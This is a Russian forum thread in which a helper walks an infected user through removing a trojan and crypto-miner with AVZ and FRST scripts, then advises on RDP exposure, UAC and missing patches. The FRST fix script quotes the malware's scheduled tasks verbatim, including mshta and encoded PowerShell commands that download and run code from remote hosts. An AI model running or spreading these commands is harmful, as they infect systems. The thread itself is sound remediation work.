Добрый вечер! Вирус заархивировал файлы и папки
Вирус заархивировал файлы и папки
Добрый вечер! Вирус заархивировал файлы и папки
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) lohudra, спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.
Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe:Компьютер перезагрузится.Код:begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); TerminateProcessByName('C:\Windows\services.exe'); TerminateProcessByName('c:\windows\temp\jlysmw.exe'); TerminateProcessByName('c:\windows\temp\pgwk.exe'); StopService('JnsUeif'); StopService('JQiGtNo'); QuarantineFile('C:\Windows\services.exe', ''); QuarantineFile('C:\s.exe', ''); QuarantineFile('c:\windows\temp\jlysmw.exe', ''); QuarantineFile('c:\windows\temp\pgwk.exe', ''); DeleteFile('C:\Windows\services.exe', ''); DeleteFile('c:\windows\temp\jlysmw.exe', ''); DeleteFile('C:\Windows\TEMP\JLySMw.exe', '64'); DeleteFile('c:\windows\temp\pgwk.exe', ''); DeleteFile('C:\Windows\TEMP\pGwK.exe', '64'); DeleteFile('C:\s.exe', '64'); DeleteService('JnsUeif'); DeleteService('JQiGtNo'); DeleteSchedulerTask('{360B179D-757F-495B-ACE4-FA860282C8DA}'); DeleteSchedulerTask('Microsoft\Windows Defender\ScannerSchduler'); DeleteSchedulerTask('Microsoft\Windows\Diagnosis\ScheduledDiagnosis'); DeleteSchedulerTask('Microsoft\Windows\Multimedia\CodecUpdateTask'); DeleteSchedulerTask('Microsoft\Windows\Multimedia\SystemVideoService'); DeleteSchedulerTask('Microsoft\Windows\Ras\WinSockets'); DeleteSchedulerTask('Microsoft\Windows\Shell\WindowsParentalControlsSettings'); DeleteSchedulerTask('Microsoft\Windows\Tcpip\IpAddressConflict'); DeleteSchedulerTask('Microsoft\Windows\WDI\UPD'); DeleteSchedulerTask('Microsoft\Windows\Windows Defender\Task Update'); DeleteSchedulerTask('Microsoft\Windows\Windows Filtering Platform\IP Filter'); DeleteSchedulerTask('Microsoft\Windows\WindowsUpdate\AUIFirmwareUpdate'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 3, 3, true); RebootWindows(true); end.
В папке с AVZ появится архив карантина quarantine.zip, упакуйте его в архив с паролем, выложите на файлообменник или в облако и дайте ссылку с паролем в личном сообщении.
Скачайте Farbar Recovery Scan Tool или с зеркала и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.
Нажмите кнопку Сканировать.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
WBR,
Vadim
это алгоритм лечения? А в разархивировании вы не поможете?Сообщение от Vvvyg
Активная зараза в системе, выполняйте.
Если заархивировано с более-менее длинным паролем - шансов, даже теоретических, нет. Чем заархивировано, кстати? Rar?
WBR,
Vadim
Да, rar(
Последний раз редактировалось lohudra; 24.02.2023 в 21:18.
И снова тот же троян и майнер.
Выделите и скопируйте в буфер обмена следующий код:Запустите FRST.EXE/FRST64.EXE, нажмите один раз Исправить и подождите. Программа создаст лог-файл (Fixlog.txt). Упакуйте его в архив и прикрепите его к своему следующему сообщению.Код:Start:: CreateRestorePoint: CloseProcesses: Task: {01F84C32-F6D2-40AF-B03C-64900F7C4C1C} - System32\Tasks\Microsoft\Windows\WDI\UPD => cmd /c mshta hxxp://eu1.minerpool.pw/upd.hta <==== ВНИМАНИЕ Task: {2B118B86-B96F-47E4-84EE-AFD29A491D44} - System32\Tasks\Microsoft\Windows\Multimedia\SystemVideoService => cmd /c powershell -nop -noni -w 1 -enc cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwAxADAANwAuADEAOAAxAC4AMQA4ADcALgAxADMAMgAvAHAAaABwAC8AZgB1AG4AYwAuAHAAaABwACAAcwBjAHIAbwBiAGoALgBkAGwAbAA= <==== ВНИМАНИЕ Task: {48D84F81-C658-422D-97E1-FA6717223A4D} - System32\Tasks\Microsoft\Windows\WindowsUpdate\AUIFirmwareUpdate => cmd /c powershell -exec bypass -e cgBlAGcAcwB2AHIAMwAyACAALwB1ACAALwBzACAALwBpADoAaAB0AHQAcAA6AC8ALwB2ADEALgBmAHkAbQA1AGcAcwBlAHIAbwBiAGgAaAAuAHAAdwAvAHAAaABwAC8AZgB1AG4AYwAuAHAAaABwACAAcwBjAHIAbwBiAGoALgBkAGwAbAA= <==== ВНИМАНИЕ Task: {5300EBE2-757C-4973-B26C-47FEBC65AF2F} - System32\Tasks\Microsoft\Windows\Multimedia\CodecUpdateTask => cmd /c mshta hxxps://eu1.minerpool.pw/checks.hta <==== ВНИМАНИЕ Task: {680E6A2A-5AA4-4E6E-8B89-0DF7BA844644} - System32\Tasks\Microsoft\Windows\Ras\WinSockets => c:\windows\services.exe [1631744 2023-02-24] () [Файл не подписан] <==== ВНИМАНИЕ Task: {7AFAEBD7-EEAD-4E93-883C-1D8AAB7915F3} - System32\Tasks\Microsoft\Windows\Shell\WindowsParentalControlsSettings => cmd /c mshta hxxp://eu1.minerpool.pw/check.hta <==== ВНИМАНИЕ Task: {84A873D2-A3D8-4A80-9E42-9EB49D71CCBC} - System32\Tasks\Microsoft\Windows\Windows Filtering Platform\IP Filter => cmd /c mshta hxxps://v1.fym5gserobhh.pw/check.hta <==== ВНИМАНИЕ Task: {85F45167-84DC-4EF1-B7A4-4B73652C8768} - System32\Tasks\Microsoft\Windows Defender\ScannerSchduler => cmd /c mshta hxxp://res1.myrms.pw/upd.hta <==== ВНИМАНИЕ Task: {962DE176-B56A-4CBB-8402-351B578F8A3F} - System32\Tasks\Microsoft\Windows\Diagnosis\ChkfsScheduled => cmd /c sc start cli_optimization_v2.0.55728_64 Task: {9FA419A6-AAD4-4A9D-9C67-DFA94B6E609E} - System32\Tasks\Microsoft\Windows\Tcpip\IpAddressConflict => cmd /c mshta hxxp://107.181.187.132/check.hta <==== ВНИМАНИЕ Task: {A37F1F3B-E7A6-4155-AE30-89DB8E1C27DF} - System32\Tasks\Microsoft\Windows\SetUpd => powershell -exec bypass -e QwA6AFwAVwBpAG4AZABvAHcAcwBcAEYAbwBuAHQAcwBcAGQAZQBsAC4AcABzADEA Task: {A6EBA10A-ED46-4A66-BCFE-D2355680B4A4} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostSearch => cmd /c schtasks /run /TN \Microsoft\Windows\Ras\WinSockets Task: {A74A7AA1-3311-4D44-BAC7-E9D7FF2BDFC9} - System32\Tasks\Microsoft\Windows\IME\SQM Data Update => cmd /c sc start cli_optimization_v2.0.56730_32 Task: {D1EB3C0A-0616-40C0-853E-4B42BB2A1A93} - System32\Tasks\Microsoft\Windows\Diagnosis\DiskDiagnostics => cmd /c sc start cli_optimization_v2.0.56733_32 Task: {DC81E86A-548F-4B87-924C-2B02BB070EAC} - System32\Tasks\Microsoft\Windows\Diagnosis\ScheduledDiagnosis => cmd /c mshta hxxps://pa.kl2a48yh.pw/check.hta <==== ВНИМАНИЕ Task: {E6A90E4F-7899-40D8-9CD7-C1708124C1B6} - System32\Tasks\Microsoft\Windows\Windows Defender\Task Update => cmd /c mshta hxxps://eu1.ax33y1mph.pw/check.hta <==== ВНИМАНИЕ S3 cli_optimization_v2.0.55728_32; cmd /c mshta hxxps://pa.kl2a48yh.pw/check.hta [X] S2 cli_optimization_v2.0.55728_64; cmd /c mshta hxxp://eu1.minerpool.pw/check.hta [X] S3 cli_optimization_v2.0.56730_32; cmd /c powershell -exec bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('hxxp://v1.fym5gserobhh.pw/v1/check1.ps1')) [X] S3 cli_optimization_v2.0.56733_32; cmd /c powershell -w 1 -exec bypass -e aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AYQAuADYAdQA5ADkAcQB2ADAAYgAuAHMAdQAvAHYAMQAvAGMAaABlAGMAawAxAC4AcABzADEAIgApACkA [X] S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X] C:\Windows\Minidump\*.dmp 2023-02-23 04:32 - 2023-02-24 00:15 - 001631744 _____ () C:\Windows\services.exe 2023-02-23 17:39 - 2015-11-15 00:31 - 1081708454 _____ C:\Windows\MEMORY.DMP ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions StartBatch: del /s /q C:\Windows\SoftwareDistribution\download\*.* del /s /q "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*" del /s /q C:\Windows\Temp\*.* del /s /q "%userprofile%\AppData\Local\temp\*.*" sfc /scannow endbatch: Reboot: End::
Компьютер будет перезагружен автоматически.
Сделайте новые логи FRST.
Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.
Приложите этот файл к своему следующему сообщению.
WBR,
Vadim
Logs
Это не сделали.
И запускать исправление дважды - совершенно лишнее.
WBR,
Vadim
Log FRST
Лог пустой, нужно переделать:Результат сканирования Farbar Recovery Scan Tool (FRST) (x64) Версия: 25-02-2023
Запущено с помощью User (Администратор) на USER-ПК (27-02-2023 15:04:03)
Запущено из C:\FRST
Загруженные профили: User
Платформа: Microsoft Windows 7 Профессиональная Service Pack 1 (X64) Язык: Русский (Россия)
Браузер по умолчанию: Chrome
Режим загрузки: Normal
================================================== ======
WBR,
Vadim
Logs FRST
Выделите и скопируйте в буфер обмена следующий код:Запустите FRST.EXE/FRST64.EXE, нажмите один раз Исправить и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.Код:Start:: Systemrestore: on CreateRestorePoint: Task: {405EA566-D064-4882-A17B-F0BDE783B370} - \Microsoft\Windows\UPnP\UPnPHostSearch -> Нет файла <==== ВНИМАНИЕ Task: {E71DB946-DE3B-4B75-BA50-B546EDF418C0} - System32\Tasks\Microsoft\Windows\Location\Telemetry => cmd /c sc start cli_optimization_v2.0.55728_32 StartBatch: wevtutil.exe epl System C:\Windows\minidump\system.evtx wevtutil.exe epl Application C:\Windows\minidump\Application.evtx wevtutil.exe epl Security C:\Windows\minidump\Security.evtx endbatch: ZIP: c:\WINDOWS\Minidump\system.evtx; c:\WINDOWS\Minidump\Application.evtx; C:\Windows\Minidump\022723-19578-01.dmp CMD: del /s /q C:\Windows\minidump\*.* 2023-02-27 12:24 - 2023-02-27 12:24 - 679247782 _____ C:\Windows\MEMORY.DMP End::
На рабочем столе будет создан архив .ZIP с именем, состоящим из даты и времени выполнения исправления, загрузите его в доступное облачное хранилище или на файлообменник без капчи и дайте ссылку в теме.
Взламывают, вероятнее всего, по RDP. Поменяйте пароли пользователей на сложные, задумайтесь о внедрении подключения по VPN.
Рекомендую ознакомиться со статьёй Так ли страшен контроль учетных записей (UAC)? и включить.Запрос на повышение прав для администраторов отключен
Запрос на повышение прав для обычных пользователей отключен
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Отключите гостя.Учетная запись гостя включена. Пароль не установлен.
Устанавливайте обязательно, это только критические хотфиксы, включая KB4012212, который закрывает опаснейшую уязвимость, используемую в т. ч. нашумевшими в 2017 году шифровальщики WannaCry и Petya/NotPetya, до сих пор активно используется шифровальщиками, майнерами и троянами для проникновения в систему.HotFix KB3177467 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4474419 Внимание! Скачать обновления
HotFix KB4565354 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4539602 Внимание! Скачать обновления
Брандмауэр лучше включить и настроить (не удалённо, конечно).Отключен общий профиль Брандмауэра Windows
Отключен частный профиль Брандмауэра Windows
WBR,
Vadim
https://dropmefiles.com/ENQCX - ссылка на архив
В журнале системы множество попыток подключения по RDP с иностранных адресов.
Сейчас ни в коем случае нельзя применять подключение р удалённому рабочему столу через интернет, без использования VPN или строгого ограничения по ip адресам на файрволе. Взломают, только вопрос времени.
- - - - -Добавлено - - - - -
Да, в первую очередь устанавливайте этот патч:Множество BSOD, вызыванных системным файлом termdd.sys, это как раз с уязвимостью CVE-2019-0708 связано, которая в системе не закрыта.HotFix KB4499175 Внимание! Скачать обновления
WBR,
Vadim
Добрый день! Спасибо Большое! Систему обновил, патчи поставил. Подскажите пожалуйста, какие дальнейшие мои действия?
У нас на предприятии проходит тестирование, настроен проброс на локальный ip-адрес, с портом, плюс как вы говорите открыт rdp по внутренней сети до этого ПК. Буду отключать правило проброса на прокси, чтобы исключить брутфорса, отключу rdp
Последний раз редактировалось lohudra; 07.03.2023 в 14:23.
Тогда по минимуму всё.
WBR,
Vadim
СПАСИБО!!!
Ваши права в разделе
Ответить с цитированием
